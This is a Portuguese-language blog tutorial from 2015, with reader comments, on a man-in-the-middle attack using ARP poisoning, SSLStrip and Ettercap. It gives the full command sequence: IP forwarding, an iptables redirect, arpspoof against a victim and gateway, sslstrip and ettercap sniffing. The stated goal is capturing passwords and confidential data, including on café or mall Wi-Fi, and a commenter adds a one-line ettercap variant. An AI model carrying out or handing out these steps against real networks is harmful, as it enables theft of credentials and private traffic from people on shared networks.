quarta-feira, 7 de outubro de 2015

Realizando ataque Man in the Middle com SSLStrip e Ettercap



Neste tutorial iremos abordar o tipo de ataque conhecido como Man in the Middle.
Esse teste "envenena" a Tabela ARP da vitima, fazendo com que a máquina atacante, nossa, se passe pelo roteador, fazendo com que consigamos interceptar o tráfego e ter acesso a dados sigilosos trocados entre os dois atores.

A exploração do ARP Poisoning é o método mais rápido de se estabelecer no meio da comunicação entre duas máquinas e interceptar as informações enviadas entre ambas, fazendo com que possua acesso a dados confidenciais, senhas e relatórios de tráfego. Esse método se aplica somente em redes Ethernet ou seja, esse tipo de comunicação pode ser resumido em redes internas, sejam elas empresariais, residenciais ou até mesmo aquele wifi livre na praça de alimentação do Shopping ou do café que você gosta de frequentar.


1. Ambiente 


Neste exemplo faram parte 3 atores:

192.168.1.52 - Máquina atacante com Debian 8 Jessie
192.168.1.57 - Vítima com Windows 8.1, podendo ser qualquer outro sistema operacional, Windows, Linux ou OSX
192.168.1.1. - Roteador como Gateway

2. Preparando o ataque.


Neste exemplo, vamos precisar ficar com 3 terminais abertos.
Abra o primeiro terminal. Agora vamos ativar o redirecionamento de pacotes.

# echo 1 > /proc/sys/net/ipv4/ip_forward

Agora vamos efetuar todo o redirecionamento de pacotes que chegar na porta 80 da nossa máquina para a porta 7777

# iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-port 7777

Agora vamos ativar o Arpspoof para confundir a tabela ARP da vítima, a sintaxe é a seguinte:

# arpspoof -i INTERFACE -t IP-DA-VITIMA IP-DO-GATEWAY

No nosso caso, como estou efetuando o ataque de uma interface Wireless a sintaxe ficaria

# arpspoof -i wlan0 -t 192.168.1.57 192.168.1.1




Vamos deixar esse terminal aberto infectando a tabela ARP da vítima. Vamos abrir outro terminal e colocar o SSLSTRIP para escutar a porta 7777

Abra outro terminal e como root, digite:

# sslstrip -l 7777

Agora colocamos o sslstrip para entrar em modo listening e ouvir tudo que chegar na porta 7777
Abra o terceiro terminal, e como root, digite:

# ettercap -Tq -i  wlan0

O ettercap é um poderoso sniffer de rede, e ele que vai nos mostrar tudo que passar pela placa wlan0 da nossa máquina. Agora a máquina da vítima está totalmente vigiada, e interceptaremos todos os pacotes que ela enviar para o gateway

Agora vamos aguardar o Host acessar algum site e preencher algum formulário. Lembrando que o Ettercap e o SSLStrip irá capturar tudo, não somente as senhas





Veja também: Capturando senhas com Social Engineering Toolkit e Ettercap

:)

SOBRE O AUTOR

Matheus Fidelis

http://msfidelis.github.io/

Power Ranger, Piloto de Helicópteros e Astronauta da NASA. Desenvolvedor Web PHP com foco em Backend e POO, Linux SysAdmin DevOps e Entusiasta Python. Criou esse site pra contribuir com a comunidade com coisas que aprende dentro de um setor maluco de TI :)

10 comentários:

  1. Respostas
    1. Se eles for efetuado o Downgrade do SSL, eles já são interceptados e aparecem sem precisar de tratamento.

      Excluir
  2. Cara, muito bom seu blog, muitos posts interessantes! Parabéns!

    ResponderExcluir
  3. Parabéns, a explicação ficou bem clara.
    Agora uma dúvida, se for uma página https?

    ResponderExcluir
    Respostas
    1. Este comentário foi removido pelo autor.

      Excluir
    2. sslstrip usa-se do metodo 'HTTPS DOWNGRADE'
      aqui esta outro 'https downgrade attack' usando um filtro do ettercap...
      http://wroot.org/posts/downgrade-https-connections-to-http-using-ettercap-filters/

      QUOTE: What if SSL is required on server-side ???
      No problem, SSL on server-side can be a requirement but by the time
      the server complains, data was already sent over in plain-text. (http) :)

      Excluir
    3. Obrigado pela ajuda Pedro!! Sua contribuição foi muito importante, sinta-se a vontade para comentar sempre.

      Excluir
    4. thanks..
      1º que tudo parabens por estares a demonstrar que o metasploit é muinto mais que um server+client,
      "na realidade é um projecto comunitario com varios actores a contribuir a todos os niveis para ele"...
      (não me estou a referir a este artigo mas sim a outros sobre o msf ;) )

      2º entao deixa-me deixar aqui uma dica sobre este attack mitm+ssltrip:
      não necessitas de te usar do 'arpspoof' porque o ettercap (uma ferrameta tambem
      fabulosa e com uma syntax de scripting bastante acessivel) tem uma flag para isso
      mesmo '-M arp:remote' <-- isto vai fazer o mesmo que o 'arpspoof' esta a fazer, e se
      por acaso quiseres ver todos o packets que viajam na rede. basta carregar em 'space'
      que o ettercap mostra todos eles a voarem (e com info mais detalhada)...

      portanto o command ettercap ficaria assim:
      ettercap -T -Q -i wlan0 -M arp:remote /target ip/ /router ip/

      "só lembrando que no file 'etter.conf' pode ser configurado o port-fowarding tambem!! eliminando a necessidade de manualmente inserir a entrada no iptables (iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-port 7777)".

      deixo-te aqui um artigo sobre os filtros (scripting) do ettercap escrito por irongeek:
      http://www.irongeek.com/i.php?page=security/ettercapfilter

      have fun...

      Excluir
    5. Muito obrigado pela contribuição, Pedro!!
      Sinta-se a vontade para comentar sempre!!

      Excluir

 
Nanoshots | Open Source Security, Linux e Tutoriais © 2015 - Designed by Templateism.com